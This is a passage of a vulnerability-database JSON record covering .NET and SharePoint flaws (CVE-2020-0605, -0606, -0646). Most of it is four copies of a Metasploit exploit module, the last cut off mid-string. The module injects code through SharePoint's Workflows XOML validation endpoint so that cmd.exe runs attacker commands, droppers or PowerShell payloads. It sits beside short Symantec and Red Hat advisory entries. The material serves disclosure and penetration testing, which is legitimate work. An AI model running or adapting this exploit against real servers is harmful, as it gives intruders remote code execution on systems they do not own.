Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-0606"], "modified": "2020-01-14T00:00:00", "id": "SMNTC-111384", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111384", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-15T00:26:13", "description": "### Description\n\nMicrosoft .NET Core is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Core 3.0 \n * Microsoft .NET Core 3.1 \n * Microsoft .NET Framework 3.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n * Microsoft .NET Framework 4.7.1 \n * Microsoft .NET Framework 4.7.2 \n * Microsoft .NET Framework 4.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2020-01-14T00:00:00", "type": "symantec", "title": "Microsoft .NET Core CVE-2020-0605 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-0605"], "modified": "2020-01-14T00:00:00", "id": "SMNTC-111378", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111378", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-25T11:23:25", "description": "This Metasploit module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-26T00:00:00", "type": "zdt", "title": "SharePoint Workflows XOML Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T00:00:00", "id": "1337DAY-ID-34152", "href": "https://0day.today/exploit/description/34152", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SharePoint Workflows XOML Injection',\n 'Description' => %q{\n This module exploits a vulnerability within SharePoint and its .NET backend\n that allows an attacker to execute commands using specially crafted XOML data\n sent to SharePoint via the Workflows functionality.\n },\n 'Author' => [\n 'Spencer McIntyre',\n 'Soroush Dalili'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2020-0646'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\n ],\n 'Platform' => 'win',\n 'Targets' => [\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\n [ 'Windows Powershell',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :windows_powershell\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-02',\n 'Notes' =>\n {\n 'Stability' => [CRASH_SAFE,],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION],\n },\n 'Privileged' => true\n ))\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\n OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\n ])\n end\n\n def check\n res = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\")\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\n\n compiler_errors = extract_compiler_errors(res)\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0\n\n # once patched you get a specific compiler error message about the type name\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/\n\n CheckCode::Vulnerable\n end\n\n def extract_compiler_errors(res)\n return nil unless res&.code == 200\n\n xml_doc = res.get_xml_document\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\n return nil if result.length == 0\n\n xml_result = Nokogiri::XML(result)\n xml_result.xpath('//CompilerError/@Text')\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n case target['Type']\n when :windows_command\n execute_command(payload.encoded)\n when :windows_dropper\n cmd_target = targets.select {|target| target['Type'] == :windows_command}.first\n execute_cmdstager({linemax: cmd_target.opts['Space']})\n when :windows_powershell\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def escape_command(cmd)\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] }\n end\n\n def execute_command(cmd, opts = {})\n xoml_data = <<-EOS\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\n <workflowMarkupText>\n <![CDATA[\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\n </SequentialWorkflowActivity>\n ]]>\n </workflowMarkupText>\n <rulesText></rulesText>\n <configBlob></configBlob>\n <flag>2</flag>\n </ValidateWorkflowMarkupAndCreateSupportObjects>\n </soap:Body>\n</soap:Envelope>\n EOS\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\n 'ctype' => 'text/xml; charset=utf-8',\n 'data' => xoml_data,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n })\n\n unless res&.code == 200\n print_error('Non-200 HTTP response received while trying to execute the command')\n end\n\n res\n end\nend\n", "sourceHref": "https://0day.today/exploit/34152", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-06-24T08:41:36", "description": "This module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality.\n", "cvss3": {}, "published": "2020-03-20T21:57:54", "type": "metasploit", "title": "SharePoint Workflows XOML Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0646"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-WINDOWS-HTTP-SHAREPOINT_WORKFLOWS_XOML-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/sharepoint_workflows_xoml/", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SharePoint Workflows XOML Injection',\n 'Description' => %q{\n This module exploits a vulnerability within SharePoint and its .NET backend\n that allows an attacker to execute commands using specially crafted XOML data\n sent to SharePoint via the Workflows functionality.\n },\n 'Author' => [\n 'Spencer McIntyre',\n 'Soroush Dalili'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2020-0646'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\n ],\n 'Platform' => 'win',\n 'Targets' => [\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\n [\n 'Windows Powershell',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :windows_powershell\n }\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-02',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE,],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\n OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\n ])\n end\n\n def check\n res = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(rand(4..11))}\")\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\n\n compiler_errors = extract_compiler_errors(res)\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length&.> 0\n\n # once patched you get a specific compiler error message about the type name\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/\n\n CheckCode::Vulnerable\n end\n\n def extract_compiler_errors(res)\n return nil unless res&.code == 200\n\n xml_doc = res.get_xml_document\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\n return nil if result.empty?\n\n xml_result = Nokogiri::XML(result)\n xml_result.xpath('//CompilerError/@Text')\n end\n\n def exploit\n case target['Type']\n when :windows_command\n execute_command(payload.encoded)\n when :windows_dropper\n cmd_target = targets.select { |target| target['Type'] == :windows_command }.first\n execute_cmdstager({ linemax: cmd_target.opts['Space'] })\n when :windows_powershell\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def escape_command(cmd)\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\n # rubocop:disable Style/FormatString\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-.=\\[\\]{}()])/) { |x| '\\\\u%.4x' % x.unpack('C*')[0] }\n # rubocop:enable Style/FormatString\n end\n\n def execute_command(cmd, _opts = {})\n xoml_data = <<~EOS\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\n <workflowMarkupText>\n <![CDATA[\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\n </SequentialWorkflowActivity>\n ]]>\n </workflowMarkupText>\n <rulesText></rulesText>\n <configBlob></configBlob>\n <flag>2</flag>\n </ValidateWorkflowMarkupAndCreateSupportObjects>\n </soap:Body>\n </soap:Envelope>\n EOS\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\n 'ctype' => 'text/xml; charset=utf-8',\n 'data' => xoml_data,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n })\n\n unless res&.code == 200\n print_error('Non-200 HTTP response received while trying to execute the command')\n end\n\n res\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/sharepoint_workflows_xoml.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-03-29T15:35:52", "description": "", "cvss3": {}, "published": "2020-03-26T00:00:00", "type": "packetstorm", "title": "SharePoint Workflows XOML Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T00:00:00", "id": "PACKETSTORM:156930", "href": "https://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html", "sourceData": "`# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SharePoint Workflows XOML Injection', \n'Description' => %q{ \nThis module exploits a vulnerability within SharePoint and its .NET backend \nthat allows an attacker to execute commands using specially crafted XOML data \nsent to SharePoint via the Workflows functionality. \n}, \n'Author' => [ \n'Spencer McIntyre', \n'Soroush Dalili' \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2020-0646'], \n['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/'] \n], \n'Platform' => 'win', \n'Targets' => [ \n[ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], \n[ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ], \n[ 'Windows Powershell', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :windows_powershell \n] \n], \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-02', \n'Notes' => \n{ \n'Stability' => [CRASH_SAFE,], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'Reliability' => [REPEATABLE_SESSION], \n}, \n'Privileged' => true \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]), \nOptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]), \nOptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) \n]) \nend \n \ndef check \nres = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\") \nreturn CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200 \n \ncompiler_errors = extract_compiler_errors(res) \nreturn CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0 \n \n# once patched you get a specific compiler error message about the type name \nreturn CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/ \n \nCheckCode::Vulnerable \nend \n \ndef extract_compiler_errors(res) \nreturn nil unless res&.code == 200 \n \nxml_doc = res.get_xml_document \nresult = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text \nreturn nil if result.length == 0 \n \nxml_result = Nokogiri::XML(result) \nxml_result.xpath('//CompilerError/@Text') \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \ncase target['Type'] \nwhen :windows_command \nexecute_command(payload.encoded) \nwhen :windows_dropper \ncmd_target = targets.select {|target| target['Type'] == :windows_command}.first \nexecute_cmdstager({linemax: cmd_target.opts['Space']}) \nwhen :windows_powershell \nexecute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)) \nend \nend \n \ndef escape_command(cmd) \n# a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode \ncmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] } \nend \n \ndef execute_command(cmd, opts = {}) \nxoml_data = <<-EOS \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\"> \n<workflowMarkupText> \n<![CDATA[ \n<SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\"> \n<CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' /> \n</SequentialWorkflowActivity> \n]]> \n</workflowMarkupText> \n<rulesText></rulesText> \n<configBlob></configBlob> \n<flag>2</flag> \n</ValidateWorkflowMarkupAndCreateSupportObjects> \n</soap:Body> \n</soap:Envelope> \nEOS \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'), \n'ctype' => 'text/xml; charset=utf-8', \n'data' => xoml_data, \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'] \n}) \n \nunless res&.code == 200 \nprint_error('Non-200 HTTP response received while trying to execute the command') \nend \n \nres \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156930/sharepoint_workflows_xoml.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2022-06-08T08:09:37", "description": "A vulnerability related to checking the source makeup of a file has been reported in .NET software. A remote attacker can exploit this vulnerability to execute arbitrary code by tricking a user into opening a specially crafted file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-14T20:09:01", "type": "redhatcve", "title": "CVE-2020-0606", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606"], "modified": "2022-06-08T06:51:19", "id": "RH:CVE-2020-0606", "href": "https://access.redhat.com/security/cve/cve-2020-0606", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-08T08:09:40", "description": "A vulnerability related to checking the source makeup of a file has been reported in .NET software. A remote attacker can exploit this vulnerability to execute arbitrary code by tricking a user into opening a specially crafted file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-14T20:09:01", "type": "redhatcve", "title": "CVE-2020-0605", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605"], "modified": "2022-06-08T06:51:07", "id": "RH:CVE-2020-0605", "href": "https://access.redhat.com/security/cve/cve-2020-0605", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-13T17:49:15", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-31T00:00:00", "type": "exploitdb", "title": "SharePoint Workflows - XOML Injection (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-0646", "CVE-2020-0646"], "modified": "2020-03-31T00:00:00", "id": "EDB-ID:48275", "href": "https://www.exploit-db.com/exploits/48275", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::AutoCheck\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SharePoint Workflows XOML Injection',\r\n 'Description' => %q{\r\n This module exploits a vulnerability within SharePoint and its .NET backend\r\n that allows an attacker to execute commands using specially crafted XOML data\r\n sent to SharePoint via the Workflows functionality.\r\n },\r\n 'Author' => [\r\n 'Spencer McIntyre',\r\n 'Soroush Dalili'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0646'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' => [\r\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\r\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\r\n [ 'Windows Powershell',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :windows_powershell\r\n ]\r\n ],\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => '2020-03-02',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [CRASH_SAFE,],\r\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n },\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\r\n OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n end\r\n\r\n def check\r\n res = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\")\r\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\r\n\r\n compiler_errors = extract_compiler_errors(res)\r\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0\r\n\r\n # once patched you get a specific compiler error message about the type name\r\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/\r\n\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def extract_compiler_errors(res)\r\n return nil unless res&.code == 200\r\n\r\n xml_doc = res.get_xml_document\r\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\r\n return nil if result.length == 0\r\n\r\n xml_result = Nokogiri::XML(result)\r\n xml_result.xpath('//CompilerError/@Text')\r\n end\r\n\r\n def exploit\r\n # NOTE: Automatic check is implemented by the AutoCheck mixin\r\n super\r\n\r\n case target['Type']\r\n when :windows_command\r\n execute_command(payload.encoded)\r\n when :windows_dropper\r\n cmd_target = targets.select {|target| target['Type'] == :windows_command}.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space']})\r\n when :windows_powershell\r\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\r\n end\r\n end\r\n\r\n def escape_command(cmd)\r\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\r\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] }\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n xoml_data = <<-EOS\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\r\n <workflowMarkupText>\r\n <![CDATA[\r\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" 